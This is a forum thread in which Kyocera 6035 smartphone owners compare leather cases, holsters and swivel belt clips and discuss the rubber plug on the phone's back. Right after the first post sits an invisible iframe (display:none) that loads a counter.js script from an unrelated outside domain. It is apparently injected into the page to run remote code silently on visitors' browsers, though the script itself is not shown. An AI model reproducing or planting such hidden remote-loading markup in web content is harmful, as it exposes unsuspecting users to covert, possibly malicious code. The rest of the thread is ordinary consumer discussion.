I am looking for ideas. I bought the Leather Case, but it doesn't work well. It stretches out and you can't sync with the cradle unless you take the phone out (which stretches it out more). THERE IS a small rubber hole on the back of the phone which I believe was designed for use with one of those plastic circles that fits into the belt clip. Does anyone know where to buy that thing and how to install it? It looks like you would have to unscrew the back of the phone to make it work.
I love the phone, but this would make carrying it a ton easier.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I believe the small rubber plug in the back of the phone covers an antenna connector that is used by technicians for calibrating the phone or something. I think I remember reading somewhere that removing that rubber plug will void the warranty on your phone. Besides, it won't help you in your search for a better way of carrying the phone.
While on the subject of the leather pouch, I am on my second one. Not because of the leather stretching out (since the velcro keeps it in place pretty well), but because the plastic piece in it broke and allowed the piece to come through the hole in the leather. My second case had the plastic piece break in exactly the same way, so that case's days are numbered now as well.
Do yourself a favor and use the site search with the words "rubber plug". It sure ain't meant for a belt clip, that's for sure :p
I bought a knock-off leather 6035 case last November on ebay for some ridiculous price (thinking it was something like $4.00). It isn't a pouch holder, but the type that allows the phone to be used in the case (albeit the same problem as the Sprint/Kyo case...must be removed to cradle). I expected the thing to fall apart in a week after examining it, but it still works great. The only unfortunate thing is, while the belt clips is strong and the phone has yet to fall from the belt, it does not swivel, so sitting in a car is uncomftable at best.
Try the MobilizeNow holster.
-Swivel locks in place
-Can sync using cable (not cradle)
-Adds only a bit of size to the phone
-Allows full use of phone (backlight is tricky to use though)
-Inexpensive
Goto Mobilizenow.com and go through the cellular menues. You'll eventually make your way to the 6035 accessories. The way that they have things setup, I couldn't provide a direct link.
I purchased a phone case from Target, and it has worked well. I got the "Large genuine leather case", model #49339 by Sanyo. It included a swivel belt clip and wrist strap, all for about $10. It has a stretch material on the sides that allows the phone to fit very nicely.

The universe does revolve around engineers, since we get to set the coordinate system.
It was not cheap, and the case does NOT protect the phone like the original from Verizon...
It is called a slipper. it goes on and leaves a space at the bottom for synching, and the face is open so you can see who is calling without pulling the phone out of the case.
Will let you know if it is a LOVE or HATE relationship after I get it.
Be warned. I went through 3 EB clips for my Handspring case and it looks like they use the same clip part. If you want a good clip that will work when you break yours, check out Vaja Cases. They have a great clip for $5 you can buy and it will work for the EB Cases.

I use the CoPilot Cell case from E & B and love it. It is not cheap but it does protect the phone. You remove the phone from the case to use and to sync but with the magnet snap it is just as quick as removing it from a belt clip situation.
I also like the look of the case. I am a school administrator and the leather provide a classy look.
Perhaps the final "like" is the fact that the phone is held horizontally along the beltline. Everyone has their own needs, but this one really works for me.
Have been using the MobilzeNow belt clips and really like them, the only downside is that they develop a crack in the back above the swivel part ... but at about $5 a pop, it is cheaper to replace than dropping $50+ on a EB or Vaja case !
I purchased a self-stick clip and "stud" from Staples or somewhere like that and stuck it to the back of the phone (it is the EB metal type with a very low profile. Using that clip, I can clip the phone to my belt for around the office without putting it in a case. I have not had any problems with banging up the phone (had it for about a year now). It still fits in the velcro-top Kyocera "nappa" leather case also, for when I want better protection. Pretty good compromise.
I had an EB slipper for my Palm IIIc color and loved its low profile. I ordered the slipper for the 6035 and sent it back because it added so much bulk to the already large phone.
I just found the perfect swivel belt clip. Go to any Best Buy, Circut City or CompUSA and look for the Universal Swivel Clip by Belkin. It's only $5! You stick a stud to the back of the phone and hold really well and then you clip it into an included belt clip. The only downside is that the phone is naked on your hip but it looks good, it's comfortable and it's a $5 solution!

I just found a Klein Tools Cellphone Holder (cat no 5715) at my local home depot for aprox 9.99, It fits the Smartphone, and seems to be doing rather well on mine.. It's made out of puncture-resistant cordura plus, so it should do pretty good with abuse..
The first case I got for my 6035 was a holster clip from CompUSA , pretty much the same design as the link Jradi posted.
It busted within 6 days, and I had to take it back to replace it. :rolleyes1
It's an ok holster, but it leaves the screen of the phone exposed. Unlike a lot of cellphones, the screen on a 6035 is real glass, and fairly sensitive.
I've managed to DESTROY the screen of a Palm III before, even when in a case. Nothing like that sharp cracking noise to ruin your day,
I really strongly recommend getting a case that covers the entire front of the phone. The KCell slipper by EB Cases is pretty nice, but way expensive. It doesn't really add that much bulk to the phone. It's biggest disadvantages are that you can't put it in the cradle with the case on, and you can't quickly move the 6035 in and out of the case. But EB Cases have done pretty well for me in the past and quite durable.
Oh, and I've never had a problem with their clip mechanism.
I've been using a Samsung all purpose clip from Target - $5 bucks. Only problem is that the 6035 is kinda big for belt clips and the plastic ones break really easy [i:ed9a3c4dd4]( I'm on my third one. I was determined to make the clip work!)[/i:ed9a3c4dd4] I going for a case next time.
A friend of mine has a 6035 and bought a very nice low-profile belt clip for it from Best Buy. It has a plastic plate with a [b:38cd82fb93]metal[/b:38cd82fb93] button on it stuck to the phone and a very nice belt clip that works much better than the Belkin brand I've been using with my Audiovox CDM9000.
Just bought a 6035 and would LOVE to find out who makes these belt clips. Best Buy doesn't have them now and no one there seems to know what I'm talking about. Grrr.
